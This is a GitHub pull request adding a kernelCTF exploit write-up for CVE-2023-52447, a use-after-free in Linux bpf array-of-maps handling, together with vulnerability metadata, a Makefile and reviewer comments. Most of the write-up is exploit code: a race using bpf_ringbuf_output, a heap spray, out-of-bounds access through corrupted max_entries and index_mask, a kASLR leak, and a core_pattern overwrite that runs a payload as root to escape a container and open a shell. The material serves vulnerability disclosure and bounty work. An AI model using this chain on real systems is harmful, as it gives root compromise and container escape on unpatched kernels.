-
Notifications
You must be signed in to change notification settings - Fork 412
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add kernelCTF CVE-2023-52447_cos #105
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,271 @@ | ||
# Exploit Tech Overview | ||
|
||
Start from https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bba1dc0b55ac, free bpf map don't need to sync with rcu_lock. | ||
We note that bpf program is running under rcu_lock and lookup arraymap from array_of_maps won't increasing it's refcount. | ||
So such a bpf program allow us to get a reference to an arraymap without increasing it's refcount. | ||
```c | ||
BPF_LD_MAP_FD(BPF_REG_9, array_of_map), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), | ||
BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), | ||
BPF_MAP_GET_ADDR( | ||
0, | ||
BPF_REG_8), //store a arraymap from array_of_map without increase refcount at BPF_REG_8 | ||
``` | ||
|
||
In summary, the vulnerability is that bpf program can hold arraymap pointer without increase refcount if it's from array_of_maps. | ||
If bpf first stores a arraymap pointer into one register, and do some time consume operation in the middle of program. | ||
It gives other thread chance to free that arraymap can reclaim it to another structure like array_of_maps. | ||
In our exploit, arraymap and array_of_maps both under cache kmalloc-1024. | ||
|
||
|
||
```C | ||
//store a arraymap from array_of_map without increase refcount at BPF_REG_8 | ||
BPF_LD_MAP_FD(BPF_REG_9, array_of_map), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), | ||
BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), | ||
BPF_MAP_GET_ADDR(0,BPF_REG_8), | ||
``` | ||
|
||
`bpf_ringbuf_output` is a bpf function that use memcpy to copy buf to into another buf in line [1]. | ||
```C | ||
BPF_CALL_4(bpf_ringbuf_output, struct bpf_map *, map, void *, data, u64, size, | ||
u64, flags) | ||
{ | ||
struct bpf_ringbuf_map *rb_map; | ||
void *rec; | ||
|
||
if (unlikely(flags & ~(BPF_RB_NO_WAKEUP | BPF_RB_FORCE_WAKEUP))) | ||
return -EINVAL; | ||
|
||
rb_map = container_of(map, struct bpf_ringbuf_map, map); | ||
rec = __bpf_ringbuf_reserve(rb_map->rb, size); | ||
if (!rec) | ||
return -EAGAIN; | ||
|
||
memcpy(rec, data, size); //[1] | ||
bpf_ringbuf_commit(rec, flags, false /* discard */); | ||
return 0; | ||
} | ||
``` | ||
|
||
If buf size is large, it will take some time to finish. | ||
It will be a good choice to extend the race windows for release and reclaim. | ||
|
||
```C | ||
// do time comsume operation using BPF_FUNC_ringbuf_output copy large size buffer | ||
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), | ||
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), | ||
BPF_MOV64_IMM(BPF_REG_3, 0x10000000), | ||
BPF_MOV64_IMM(BPF_REG_4, 0x0), | ||
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_output) | ||
``` | ||
|
||
Once the thread on one core is busy at bpf program. | ||
We use another thread in another core to free and reclaim. | ||
Using a mmapable bpf to get the signal from bpf to nodify us we can start free. | ||
|
||
```c | ||
// Create a mmapable arraymap to signal we have stored target arraymap | ||
int signal = bpf_create_map_mmap(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); | ||
// mmap arraymap region for userspace to know signal. | ||
signal_addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, | ||
signal, 0); | ||
``` | ||
|
||
thread0 write value `1` into our signal arraymap | ||
```c | ||
BPF_LD_MAP_FD(BPF_REG_9, signal), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_7), | ||
BPF_ST_MEM( | ||
BPF_W, BPF_REG_7, 0, | ||
1), // write value one to signal that we have stored target arraymap | ||
|
||
``` | ||
|
||
thread1 busy wait until signal_addr become `1` and start free target | ||
```c | ||
while (signal_addr[0] == 0) | ||
; | ||
// Free target | ||
update_elem(array_of_map, 0, victim); | ||
``` | ||
|
||
thread2 busy wait until signal_addr become `1` and start spray to reclaim as array_of_maps. | ||
Max_entries as 0x30 is to make sure reclaim array_of_maps in kmalloc-1024 which as cache as arraymap. | ||
|
||
```c | ||
while (signal_addr[0] == 0) | ||
; | ||
for (int i = 0; i < 0x100; i++) { | ||
spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, | ||
0x30, samplemap); | ||
update_elem(spray_fd[i], 0, victim); | ||
} | ||
|
||
``` | ||
|
||
|
||
Bpf program treats BPF_REG_8 stored map address as arrymap, but it's arry_of_maps. | ||
```C | ||
// Now BPF_REG_8 is freed and reallocate as array_of_map | ||
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,0), | ||
``` | ||
|
||
We can leak arrymap address and array_map_ops by malformed arraymap. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Could you add a note that based on array_map_ops you can find the kASLR base address? |
||
Once we know array_map_ops kernel address, we can find the kASLR base address | ||
``` | ||
gef➤ p &array_map_ops | ||
$2 = (const struct bpf_map_ops *) 0xffffffff829c29e0 <array_map_ops> | ||
gef➤ p _stext | ||
$3 = {<text variable, no debug info>} 0xffffffff81000000 <startup_64> | ||
``` | ||
|
||
```C | ||
BPF_LDX_MEM( BPF_DW, BPF_REG_0, BPF_REG_8, 0), // Now BPF_REG_8 is freed and reallocate as array_of_map | ||
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 0), // store a arrymap address to our arrymap as value | ||
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110), // adjust address to make value as bpf_array.map | ||
BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_0,0), //store our malformed arraymap info array_of_maps | ||
``` | ||
|
||
# Exploit Tech Detail | ||
|
||
The exploit after win the race | ||
|
||
* Modified victim arraymap's max_entries and index_mask. | ||
* Use victim arraymap to modified near array_of_maps's value index 0 arraymap as (core_pattern-struct_bpf_array_offset). | ||
* Update array_of_maps to modify core_pattern. | ||
* Achieve container escape. | ||
|
||
|
||
## Modified victim arraymap's max_entries and index_mask. | ||
|
||
As the value is adjust as bpf_array.map, so we can create a bpf program to modify map.max_entrieds and array->index_mask | ||
|
||
```C | ||
BPF_LD_MAP_FD(BPF_REG_9, target), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_9), | ||
BPF_MAP_GET_ADDR(4, BPF_REG_8), | ||
BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), //modify map.max_entries | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. The new value written to map.max_entries is 0x800. Can you explain why this specific value is chosen, for example "we need this much room for the out-of-bounds because of X"? |
||
|
||
BPF_MAP_GET_ADDR(0x20, BPF_REG_8), | ||
BPF_ST_MEM(BPF_W, BPF_REG_8, 4,0xffff), //modify array->index_mask | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. The new value written to array->index_mask is 0xffff. Can you explain why it's useful for enabling out-of-bounds access? |
||
``` | ||
|
||
Modify map.max_entries as 0x800 to make sure it can overwrite to the next chunk under kmalloc-1024. | ||
Modify array->index_mask to 0xffff to achive oob read/write in array_map_lookup_elem and array_map_update_elem. | ||
```c | ||
static void *array_map_lookup_elem(struct bpf_map *map, void *key) | ||
{ | ||
... | ||
|
||
return array->value + (u64)array->elem_size * (index & array->index_mask); | ||
|
||
|
||
static long array_map_update_elem(struct bpf_map *map, void *key, void *value, | ||
u64 map_flags) | ||
{ | ||
... | ||
val = array->value + | ||
(u64)array->elem_size * (index & array->index_mask); | ||
``` | ||
|
||
|
||
So later we use bpf syscall to call array_map_lookup_elem/array_map_update_elem on bigger index. | ||
|
||
## Use victim arraymap to modified near array_of_maps's value index 0 arraymap as (core_pattern-struct_bpf_array_offset). | ||
|
||
Out of bound access from victim to modify next chunk's contents. | ||
Use heap feng shui. Allocate some array_of_maps before and after victim arraymap. | ||
```c | ||
// Allocate some array of maps before victim | ||
for (int i = 0; i < 0x10; i++) | ||
oob[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30, | ||
samplemap); | ||
victim = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); | ||
|
||
// Allocate some array of maps after victim | ||
for (int i = 0; i < 0x10; i++) | ||
oob[i + 0x10] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, | ||
0x30, samplemap); | ||
|
||
``` | ||
The next chunk can be array_of_maps and we ovewrite its index 0 arraymap. | ||
```c | ||
// Store the address (core_pattern - struct_bpf_array_offset) we want to overwrite. | ||
update_elem(victim, (0x400 + 0x110 - 0x110) / 8, kaddr); | ||
``` | ||
|
||
## Update array_of_maps to modify core_pattern. | ||
|
||
Create another bpf program to modify index 0 arraymap and core_pattern will be overwritten. | ||
|
||
```C | ||
BPF_LD_MAP_FD(BPF_REG_9, target), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_9), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), // BPF_REG_8 will point to core_pattern | ||
BPF_MAP_GET_ADDR(1, BPF_REG_7), // BPF_REG_8 will point to core_pattern+8 | ||
BPF_MAP_GET_ADDR(2, BPF_REG_6), // BPF_REG_8 will point to core_pattern+16 | ||
|
||
BPF_LD_MAP_FD(BPF_REG_9, data), | ||
|
||
// Modify core_pattern to |/proc/%P/fd/666 %P | ||
BPF_MAP_GET(0, BPF_REG_4), | ||
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0), | ||
BPF_MAP_GET(1, BPF_REG_4), | ||
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0), | ||
BPF_MAP_GET(2, BPF_REG_4), | ||
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_4, 0), | ||
|
||
BPF_MOV64_IMM(BPF_REG_0, 0), | ||
BPF_EXIT_INSN() | ||
``` | ||
|
||
## Achieve container escape. | ||
|
||
After core_pattern being overwritten to `|/proc/%P/fd/666 %P`: | ||
|
||
We then use memfd and write an executable file payload in fd 666. | ||
```C | ||
int check_core() | ||
{ | ||
// Check if /proc/sys/kernel/core_pattern has been overwritten | ||
char buf[0x100] = {}; | ||
int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); | ||
read(core, buf, sizeof(buf)); | ||
close(core); | ||
return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; | ||
} | ||
void crash(char *cmd) | ||
{ | ||
int memfd = memfd_create("", 0); | ||
SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); | ||
dup2(memfd, 666); | ||
close(memfd); | ||
while (check_core() == 0) | ||
sleep(1); | ||
puts("Root shell !!"); | ||
/* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ | ||
*(size_t *)0 = 0; | ||
} | ||
``` | ||
|
||
Later when coredump happened, it will execute our executable file as root in root namespace: | ||
```C | ||
*(size_t*)0=0; //trigger coredump | ||
``` | ||
|
||
This code for root to run looks like: | ||
```c++ | ||
// This section of code will be execute by root! | ||
int pid = strtoull(argv[1], 0, 10); | ||
int pfd = syscall(SYS_pidfd_open, pid, 0); | ||
int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); | ||
int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); | ||
int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); | ||
dup2(stdinfd, 0); | ||
dup2(stdoutfd, 1); | ||
dup2(stderrfd, 2); | ||
/* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ | ||
system("cat /flag"); | ||
execlp("bash", "bash", NULL); | ||
``` |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
- Requirements: | ||
- Capabilites: NA | ||
- Kernel configuration: CONFIG_BPF_SYSCALL=y | ||
- User namespaces required: No | ||
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=bba1dc0b55ac462d24ed1228ad49800c238cd6d7 | ||
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=876673364161da50eed6b472d746ef88242b2368 | ||
- Affected Version: v5.8 - v6.6 | ||
- Affected Component: bpf | ||
- Syscall to disable: bpf | ||
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52447 | ||
- Cause: Use-After-Free | ||
- Description: A use-after-free vulnerability in the Linux kernel's bpf. Release the reference of the old element in the map during map update or map deletion. The release must be deferred, otherwise the bpf program may incur use-after-free problems. We recommend upgrading past commit 876673364161da50eed6b472d746ef88242b2368. |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
all: exploit | ||
|
||
exploit: exploit.c | ||
gcc -o exploit exploit.c -static -pthread | ||
|
||
clean: | ||
rm -rf exploit |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can you explain why the value 0x30 is chosen here?